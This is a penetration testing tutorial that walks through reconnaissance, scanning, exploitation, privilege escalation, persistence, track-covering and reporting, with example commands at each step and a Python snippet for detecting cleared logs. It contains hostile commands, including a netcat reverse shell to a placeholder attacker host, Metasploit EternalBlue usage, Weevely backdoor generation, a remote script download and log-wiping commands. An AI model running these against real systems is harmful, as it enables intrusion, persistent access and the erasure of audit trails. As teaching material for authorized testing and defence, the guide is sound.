A Comprehensive Guide to Penetration Testing: Steps, Tools, and Commands
In 2025, cyber threats are evolving rapidly, making penetration testing (pen testing) a critical security practice for businesses. Pen testing helps identify vulnerabilities before attackers can exploit them. This guide covers the key steps of penetration testing, along with essential tools and example commands used in ethical hacking.
Understanding Penetration Testing
Penetration testing is a simulated cyberattack against an organization’s IT infrastructure to uncover security weaknesses. It follows a structured approach based on industry-standard methodologies like:
NIST 800-115 (Technical Guide to Information Security Testing)
OWASP Testing Guide (For web applications)
MITRE ATT&CK Framework (Adversary tactics and techniques)
Pen testers use ethical hacking techniques to mimic real-world attacks, assess security risks, and recommend remediation strategies.
Penetration Testing Steps
Step 1: Reconnaissance (Information Gathering)
The first step is gathering as much information as possible about the target. This includes domain names, IP addresses, open ports, and employee details.
Tools and Commands:
whois – Retrieves domain registration information
whois example.com
nslookup – Finds DNS records
nslookup example.com
theHarvester – Collects emails, subdomains, and employee names
theHarvester -d example.com -l 500 -b google
Shodan – A search engine for internet-connected devices
shodan search "apache"
Step 2: Scanning and Enumeration
Once reconnaissance is complete, scanning identifies open ports, services, and vulnerabilities.
Tools and Commands:
Nmap – Scans for open ports and services
nmap -A -T4 example.com
Nikto – Web vulnerability scanner
nikto -h http://example.com
Enum4Linux – Extracts SMB and NetBIOS information
enum4linux -a 192.168.1.10
Gobuster – Directory and file brute-force scanner
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
Step 3: Gaining Access (Exploitation)
This step involves exploiting identified vulnerabilities to gain control of the system.
Tools and Commands:
Metasploit Framework – Exploit development and execution
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
exploit
SQLmap – Automated SQL injection tool
sqlmap -u "http://example.com/page.php?id=1" --dbs
Hydra – Brute-force login attacks
hydra -l admin -P passwords.txt ftp://192.168.1.10
Step 4: Privilege Escalation
Once access is gained, privilege escalation is used to move from a low-privileged account to an administrator/root account.
Tools and Commands:
Linux Privilege Escalation Script
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Windows Privilege Enumeration via PowerShell (lists the current token's privileges)
whoami /priv
Locate SUID binaries on Linux (candidates for privilege escalation)
find / -perm -4000 -type f 2>/dev/null
Step 5: Maintaining Access (Persistence)
Attackers often create backdoors to maintain access after an initial compromise.
Tools and Commands:
Netcat backdoor
nc -lvnp 4444
nc -e /bin/bash attacker_ip 4444
Weevely – PHP backdoor
weevely generate mypassword backdoor.php
Step 6: Covering Tracks
To avoid detection, attackers erase logs and other traces of their activity. Pen testers should instead document every action they take and must never delete logs unless the engagement explicitly authorizes it.
Commands:
Truncate the Linux authentication log
echo "" > /var/log/auth.log
Windows Event Log Clearing
wevtutil cl Security
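Both commands above leave traces a defender can look for. As an added example (not from the original article), this Python check flags the Windows "log cleared" records (Event ID 1102 in the Security channel, which wevtutil cl Security generates, and 104 for the System log) in an exported event stream, and a Linux auth.log whose size shrank between checks, which is what the echo truncation produces. The JSON-lines export format and the size samples are constructed test data.

```python
"""Detect the two log-clearing actions shown in Step 6 (added example)."""
import json

# Constructed sample: Windows Security events exported as JSON lines by a SIEM.
WINDOWS_EVENTS = """\
{"EventID": 4624, "Channel": "Security", "SubjectUserName": "jdoe", "TimeCreated": "2025-03-01T10:00:00Z"}
{"EventID": 1102, "Channel": "Security", "SubjectUserName": "jdoe", "TimeCreated": "2025-03-01T10:05:12Z"}
{"EventID": 4672, "Channel": "Security", "SubjectUserName": "SYSTEM", "TimeCreated": "2025-03-01T10:06:00Z"}
"""

# Constructed sample: byte size of /var/log/auth.log at four successive checks.
AUTH_LOG_SIZES = [10240, 12288, 1, 512]

# Event IDs Windows writes when a log is cleared (1102: Security, 104: System).
LOG_CLEARED_EVENT_IDS = {1102: "Security audit log cleared", 104: "System event log cleared"}


def find_cleared_windows_logs(jsonl: str) -> list[dict]:
    """Return one record per event that documents a log being cleared."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") in LOG_CLEARED_EVENT_IDS:
            hits.append({
                "time": ev["TimeCreated"],
                "user": ev.get("SubjectUserName"),
                "reason": LOG_CLEARED_EVENT_IDS[ev["EventID"]],
            })
    return hits


def find_truncations(sizes: list[int]) -> list[tuple[int, int, int]]:
    """Return (check_index, previous_size, new_size) wherever the log shrank.

    A log file normally only grows between checks; rotation moves the old file
    aside and starts a new one, so a shrink that does not coincide with a
    rotation job is worth investigating."""
    return [(i, sizes[i - 1], s) for i, s in enumerate(sizes) if i and s < sizes[i - 1]]


if __name__ == "__main__":
    for hit in find_cleared_windows_logs(WINDOWS_EVENTS):
        print(f"{hit['time']} {hit['user']}: {hit['reason']}")
    for idx, before, after in find_truncations(AUTH_LOG_SIZES):
        print(f"check {idx}: auth.log shrank from {before} to {after} bytes")
```

Feed the first function the JSON-lines output of your SIEM or event forwarder and the second a history of stat() sizes to turn the check into a scheduled alert.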
Step 7: Reporting and Remediation
The final step is documenting all findings, vulnerabilities, and exploits, along with recommendations to fix them.
A penetration testing report typically includes:
Executive Summary – High-level risks and impact
Technical Details – Steps taken, tools used, and vulnerabilities found
Risk Rating – Categorization of risks based on severity
Remediation Steps – Recommended actions to mitigate risks
Legal and Ethical Considerations
Ethical hacking must always be conducted with proper authorization. Pen testers must follow:
Written consent from the target organization
Legal guidelines under cybersecurity laws
Responsible disclosure policies
Unauthorized hacking is illegal and punishable under laws like:
Computer Fraud and Abuse Act (CFAA) – USA
General Data Protection Regulation (GDPR) – EU
Information Technology Act – India